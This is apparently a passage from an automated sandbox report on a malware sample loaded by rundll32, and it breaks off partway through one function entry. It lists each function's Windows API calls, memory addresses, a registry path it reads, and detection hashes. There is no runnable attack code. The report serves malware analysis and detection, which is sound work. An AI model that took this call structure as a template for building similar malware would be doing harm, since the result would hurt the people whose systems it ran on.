                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05803810 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,0580D2C5,00000000,00000001,?,?,?), ref: 05803827
                                            • lstrlen.KERNEL32(?), ref: 05803837
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0580386B
                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05803896
                                            • memcpy.NTDLL(00000000,?,?), ref: 058038B5
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05803916
                                            • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 05803938
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Allocatelstrlenmemcpy$Free
                                            • String ID: W
                                            • API String ID: 3204852930-655174618
                                            • Opcode ID: 79d66e4c6aa27b98b96282b058865671a01fff7c491d22a0f325ffd0f07fe3cf
                                            • Instruction ID: 9ac5a06696fe24fa442a4d9055e560f1e0f8c0d64b4590ee6b4b9a50ba987787
                                            • Opcode Fuzzy Hash: 79d66e4c6aa27b98b96282b058865671a01fff7c491d22a0f325ffd0f07fe3cf
                                            • Instruction Fuzzy Hash: 0641287290120AEBDF51CF99CC85AAEBFB9FF05244F148869ED05E7250EB309E548B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05812ACE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580F123: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?,?,00000000), ref: 0580F12F
                                              • Part of subcall function 0580F123: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?), ref: 0580F18D
                                              • Part of subcall function 0580F123: lstrcpy.KERNEL32(00000000,00000000), ref: 0580F19D
                                            • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 05812B1A
                                            • wsprintfA.USER32 ref: 05812B48
                                            • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 05812BA6
                                            • GetLastError.KERNEL32 ref: 05812BBD
                                            • ResetEvent.KERNEL32(?), ref: 05812BD1
                                            • ResetEvent.KERNEL32(?), ref: 05812BD6
                                            • GetLastError.KERNEL32 ref: 05812BEE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                                            • String ID: `
                                            • API String ID: 2276693960-1850852036
                                            • Opcode ID: 8875ae2af7e97b80945468d64a905adc6d9c6aaf155b803e70754a5fb945dadf
                                            • Instruction ID: a09503fae4e38ff4782c9417314eadf4fd67b483441e6c5cf0004a0013d5bf48
                                            • Opcode Fuzzy Hash: 8875ae2af7e97b80945468d64a905adc6d9c6aaf155b803e70754a5fb945dadf
                                            • Instruction Fuzzy Hash: B1415975500209EFDF21EFA5DD49AAA7FB9FF14314F008415FD02E2150DB70AA54DB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05803622 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(0580D8E9,00000000,?,?,?,?,0580D8E9,00000035,00000000,?,00000000), ref: 05803652
                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05803668
                                            • memcpy.NTDLL(00000010,0580D8E9,00000000,?,?,0580D8E9,00000035,00000000), ref: 0580369E
                                            • memcpy.NTDLL(00000010,00000000,00000035,?,?,0580D8E9,00000035), ref: 058036B9
                                            • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 058036D7
                                            • GetLastError.KERNEL32(?,?,0580D8E9,00000035), ref: 058036E1
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0580D8E9,00000035), ref: 05803704
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                            • String ID: (
                                            • API String ID: 2237239663-3887548279
                                            • Opcode ID: f4833630a4ff9e17d7250817cc4913eaf208bdac822abe79715e66b8c32eba0d
                                            • Instruction ID: c256061ced9de1de88f870025647e14a07c9879caadf485f6fde492dff5b86d4
                                            • Opcode Fuzzy Hash: f4833630a4ff9e17d7250817cc4913eaf208bdac822abe79715e66b8c32eba0d
                                            • Instruction Fuzzy Hash: C7319F76500209EFDB60CFA5DC45AAB7FB9FB44750F048825FD16D2250DA30ED94DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05806778 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 05806793
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0580684B
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 058067E1
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 058067FA
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 05806819
                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 0580682B
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 05806833
                                            Strings
                                            • Software\Microsoft\WAB\DLLPath, xrefs: 05806784
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                            • String ID: Software\Microsoft\WAB\DLLPath
                                            • API String ID: 1628847533-3156921957
                                            • Opcode ID: 8d4588e826d1015b5f050b33f4e551007211e57ddb3ea7199f65207b91bd94f3
                                            • Instruction ID: a2cc19307963ee962ec72997b2953e9d4acd1e7fdf7d92a5ec55eedbb7ff7cda
                                            • Opcode Fuzzy Hash: 8d4588e826d1015b5f050b33f4e551007211e57ddb3ea7199f65207b91bd94f3
                                            • Instruction Fuzzy Hash: 0721A772900218FFDB61ABA6DC4ACAEBFBDFB48610B115165FD02E3150EB315D50CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581A2FF Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL ref: 0581A340
                                            • memset.NTDLL ref: 0581A354
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • GetCurrentThreadId.KERNEL32 ref: 0581A3E1
                                            • GetCurrentThread.KERNEL32 ref: 0581A3F4
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0581A49B
                                            • Sleep.KERNEL32(0000000A), ref: 0581A4A5
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0581A4CB
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581A4F9
                                            • HeapFree.KERNEL32(00000000,00000018), ref: 0581A50C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                            • String ID:
                                            • API String ID: 1146182784-0
                                            • Opcode ID: f5ee589c3368eb82daf79f42fab4f6c9fc71bddde5d44f485c54f32cc5a8fcc4
                                            • Instruction ID: c5feb0b39d02a08e3aae0a3dd496eae4a213eabe9b2373100bc820710bfa5826
                                            • Opcode Fuzzy Hash: f5ee589c3368eb82daf79f42fab4f6c9fc71bddde5d44f485c54f32cc5a8fcc4
                                            • Instruction Fuzzy Hash: B1515BB1518305AFD720DF65D88996ABFE9FB48210F008C2DFD86D7250D730ED898B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05810682 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581ACA0: RtlEnterCriticalSection.NTDLL(05829448), ref: 0581ACA8
                                              • Part of subcall function 0581ACA0: RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581ACBD
                                              • Part of subcall function 0581ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 0581ACD6
                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 058106BF
                                            • memset.NTDLL ref: 058106D0
                                            • lstrcmpi.KERNEL32(?,?), ref: 05810710
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0581073C
                                            • memcpy.NTDLL(00000000,?,?), ref: 05810750
                                            • memset.NTDLL ref: 0581075D
                                            • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 05810776
                                            • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 05810799
                                            • HeapFree.KERNEL32(00000000,?), ref: 058107B6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                            • String ID:
                                            • API String ID: 694413484-0
                                            • Opcode ID: 5c07dffe99da0517dad68d3e17436fc1cb5d673a1be1ad5e157ce99f103df97d
                                            • Instruction ID: 5ce0d7b03554de61fca5f818df0223129013cecd56e7a8ac9de84f94fd8a95c9
                                            • Opcode Fuzzy Hash: 5c07dffe99da0517dad68d3e17436fc1cb5d673a1be1ad5e157ce99f103df97d
                                            • Instruction Fuzzy Hash: CC416F72A00219EFDB209FA5DC8DA9D7FB9BB04314F148429FD05E7250EB35AE848B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058178F5 Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0581790C
                                            • lstrlen.KERNEL32(?), ref: 05817914
                                            • lstrlen.KERNEL32(?), ref: 0581797F
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058179AA
                                            • memcpy.NTDLL(00000000,00000002,?), ref: 058179BB
                                            • memcpy.NTDLL(00000000,?,?), ref: 058179D1
                                            • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 058179E3
                                            • memcpy.NTDLL(00000000,058243E8,00000002,00000000,?,?,00000000,?,?), ref: 058179F6
                                            • memcpy.NTDLL(00000000,?,00000002), ref: 05817A0B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcpy$lstrlen$AllocateHeap
                                            • String ID:
                                            • API String ID: 3386453358-0
                                            • Opcode ID: 673ed4f2b7a176c9e3a049077eec87678a8678b8f0602fb32fc0fc1986bd4e9f
                                            • Instruction ID: e840e972d0f2761b8f9087a7175e1d6154193f5cf4f0f13a4ddafa753c39f32e
                                            • Opcode Fuzzy Hash: 673ed4f2b7a176c9e3a049077eec87678a8678b8f0602fb32fc0fc1986bd4e9f
                                            • Instruction Fuzzy Hash: D8412C72E01219EBCF11DFA8CC84A9EBFB9FF48214F14445AED06E7211E731AA54CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581B845 Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581ACA0: RtlEnterCriticalSection.NTDLL(05829448), ref: 0581ACA8
                                              • Part of subcall function 0581ACA0: RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581ACBD
                                              • Part of subcall function 0581ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 0581ACD6
                                            • RtlAllocateHeap.NTDLL(00000000,058079C7,00000000), ref: 0581B896
                                            • lstrlen.KERNEL32(00000008,?,?,?,058079C7,00000000), ref: 0581B8A5
                                            • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 0581B8B7
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,058079C7,00000000), ref: 0581B8C7
                                            • memcpy.NTDLL(00000000,00000000,058079C7,?,?,?,058079C7,00000000), ref: 0581B8D9
                                            • lstrcpy.KERNEL32(00000020), ref: 0581B90B
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0581B917
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581B96F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3746371830-0
                                            • Opcode ID: f74de4735efd04329567ec50704ff9c442b83ff51c8c7311045631d7e0e8d47f
                                            • Instruction ID: dcabd1bad582dc742015173a32bdc4341a693d383974cd91786a08a96ace92a7
                                            • Opcode Fuzzy Hash: f74de4735efd04329567ec50704ff9c442b83ff51c8c7311045631d7e0e8d47f
                                            • Instruction Fuzzy Hash: 804147B1510709EFCB218F68D885B6ABFB8FB04756F108519FC4AD7210EB70E994CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580156E Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580A689: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0580A6BB
                                              • Part of subcall function 0580A689: HeapFree.KERNEL32(00000000,00000000,?,?,0580158A,?,00000022,00000000,00000000,00000000,?,?), ref: 0580A6E0
                                              • Part of subcall function 05802CBD: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,058015AB,?,?,?,?,?,00000022,00000000,00000000), ref: 05802CF9
                                              • Part of subcall function 05802CBD: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,058015AB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 05802D4C
                                            • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 058015E0
                                            • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 058015E8
                                            • lstrlen.KERNEL32(?), ref: 058015F2
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05801607
                                            • wsprintfA.USER32 ref: 05801643
                                            • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 05801662
                                            • HeapFree.KERNEL32(00000000,?), ref: 05801677
                                            • HeapFree.KERNEL32(00000000,?), ref: 05801684
                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05801692
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                            • String ID:
                                            • API String ID: 168057987-0
                                            • Opcode ID: 7ba011d8d0979ccecaf9ab8090308e94fafacc8886ade51e6d921cfa337ff70c
                                            • Instruction ID: 849b0254bcb2e54d31fefeb77fd8c69a35978ce65bb832bc1b70213385c1009c
                                            • Opcode Fuzzy Hash: 7ba011d8d0979ccecaf9ab8090308e94fafacc8886ade51e6d921cfa337ff70c
                                            • Instruction Fuzzy Hash: 4B318D31604314BBDB61AFA4DC49EAA7EA8EF48320F01492AFD45D2190DB70DC548BA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05803486 Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                            • GetLastError.KERNEL32 ref: 058034D0
                                            • WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                            • WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                            • SetEndOfFile.KERNEL32(?), ref: 05803562
                                            • GetLastError.KERNEL32 ref: 0580356E
                                            • CloseHandle.KERNEL32(?), ref: 0580357A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                            • String ID:
                                            • API String ID: 2864405449-0
                                            • Opcode ID: cb7cdb80fdc5ca758d3bf570124d1a28c238fb00a70973a6656593eb6a69238c
                                            • Instruction ID: e62ea222ef2afb2ba634c341c55c22f939523d217f2dc8791b2806f38e119677
                                            • Opcode Fuzzy Hash: cb7cdb80fdc5ca758d3bf570124d1a28c238fb00a70973a6656593eb6a69238c
                                            • Instruction Fuzzy Hash: 37315C71900208BFEB609FA5DC4ABAE7FB9FB05326F208554FD11E61E0CB705E949B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05806953 Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,0580F6B3,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 05806972
                                            • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 058069A6
                                            • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 058069AE
                                            • GetLastError.KERNEL32 ref: 058069B8
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 058069D4
                                            • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 058069ED
                                            • CancelIo.KERNEL32(?), ref: 05806A02
                                            • CloseHandle.KERNEL32(?), ref: 05806A12
                                            • GetLastError.KERNEL32 ref: 05806A1A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                            • String ID:
                                            • API String ID: 4263211335-0
                                            • Opcode ID: 7c04c8b9a34d71b59ae6bc59c2b3cca94b4854f8108a71241994f40f6c9fe32c
                                            • Instruction ID: 00bfd5115ab659d8af7b8531369ef2e9e39816ddc9b176ac5ad442289253059d
                                            • Opcode Fuzzy Hash: 7c04c8b9a34d71b59ae6bc59c2b3cca94b4854f8108a71241994f40f6c9fe32c
                                            • Instruction Fuzzy Hash: 62216032910118BFDF51AFA6DC499EE7F7AFB44310B108021FD16D6190EB309AA08BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058039E2 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 058039EE
                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 05803A04
                                            • _snwprintf.NTDLL ref: 05803A29
                                            • CreateFileMappingW.KERNEL32(000000FF,05829208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 05803A45
                                            • GetLastError.KERNEL32 ref: 05803A57
                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 05803A6E
                                            • CloseHandle.KERNEL32(00000000), ref: 05803A8F
                                            • GetLastError.KERNEL32 ref: 05803A97
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                            • String ID:
                                            • API String ID: 1814172918-0
                                            • Opcode ID: f0f06d025b428793605be520a2f061f3daf5e3a4682378f27733747d6a43be44
                                            • Instruction ID: de6581284895cb75b55a1b89324f5d38364108cfdb0a22e29c1d4ff155737736
                                            • Opcode Fuzzy Hash: f0f06d025b428793605be520a2f061f3daf5e3a4682378f27733747d6a43be44
                                            • Instruction Fuzzy Hash: 3621D576741218BFDB61DB68DC0AF8E3FA9AB48710F114021FE16E71D0DE70AD448B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580B2AD Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(00000000,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?,00000000,00000000,00000000), ref: 0580B3AB
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0580B3CE
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 0580B3D6
                                            • lstrlenW.KERNEL32(00000000,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?,?,05D79A03,?), ref: 0580B421
                                            • memcpy.NTDLL(00000000,?,?,?,?,?,?,0580980E,?), ref: 0580B489
                                            • LocalFree.KERNEL32(?,?,?,?,?,0580980E,?), ref: 0580B4A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                            • String ID: P
                                            • API String ID: 3649579052-3110715001
                                            • Opcode ID: 32ba602aa385878ff6452edf71cc0b16139b4515fb2554257dbf67279507224b
                                            • Instruction ID: 37b1788c313bebe6c8467ce007b2134593687aeaa7add231d0f324f30cea7e10
                                            • Opcode Fuzzy Hash: 32ba602aa385878ff6452edf71cc0b16139b4515fb2554257dbf67279507224b
                                            • Instruction Fuzzy Hash: A1615971A0060AAFDF60EFA9CC88DAE7FB9FB44315B108025FD05E7250DA35AE45CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581D818 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581D5E6: InterlockedIncrement.KERNEL32(00000018), ref: 0581D637
                                              • Part of subcall function 0581D5E6: RtlLeaveCriticalSection.NTDLL(05D7C378), ref: 0581D6C2
                                            • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C,00000000,00000000,?,?,?,0580E219,?), ref: 0581D872
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C,00000000,00000000,?,?,?,0580E219,?), ref: 0581D890
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0581D8F8
                                            • lstrlenW.KERNEL32(?), ref: 0581D96D
                                            • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0581D989
                                            • memcpy.NTDLL(00000014,?,00000002), ref: 0581D9A1
                                              • Part of subcall function 05801924: RtlLeaveCriticalSection.NTDLL(?), ref: 058019A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                                            • String ID: o
                                            • API String ID: 2541713525-252678980
                                            • Opcode ID: 7c269b4f102df9ee1898da5367106477b17d9ad2b78bbd8527ffb7810fca6b3d
                                            • Instruction ID: 473eabaefa71b9fa9ed9b253555f364c597bcaabb48585b846a4cc642ed06d9a
                                            • Opcode Fuzzy Hash: 7c269b4f102df9ee1898da5367106477b17d9ad2b78bbd8527ffb7810fca6b3d
                                            • Instruction Fuzzy Hash: 93516B71651706ABDB20DF64D889BAABBECFF04704F008529EE57D7250DB70E984CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580984B Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581BAC0: RegCreateKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BAD5
                                              • Part of subcall function 0581BAC0: lstrlen.KERNEL32(05D7B7F0,00000000,00000000,0582806E,?,?,?,05806B9D,00000001,00000000,?), ref: 0581BAFE
                                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05809890
                                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 058098A8
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0580990A
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580991E
                                            • WaitForSingleObject.KERNEL32(00000000,?,00000000,?), ref: 05809970
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05809999
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 058099A9
                                            • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 058099B2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                            • String ID:
                                            • API String ID: 3503961013-0
                                            • Opcode ID: c2ed5a172a02f07bc4eef489d3368036e433e6961d3e6cdcf0ad626862e64d13
                                            • Instruction ID: 2d4a8e918bf1fb26427fa35ca11bfd7deab79244f5b303d8d60c76ed4616dd7d
                                            • Opcode Fuzzy Hash: c2ed5a172a02f07bc4eef489d3368036e433e6961d3e6cdcf0ad626862e64d13
                                            • Instruction Fuzzy Hash: 0041D1B5D1020DEFDF519FA4DC858EEBFBAFB08314F10846AFA01E2260D6355E949B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580B175 Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,05812B68), ref: 0580B18B
                                            • wsprintfA.USER32 ref: 0580B1B3
                                            • lstrlen.KERNEL32(?), ref: 0580B1C2
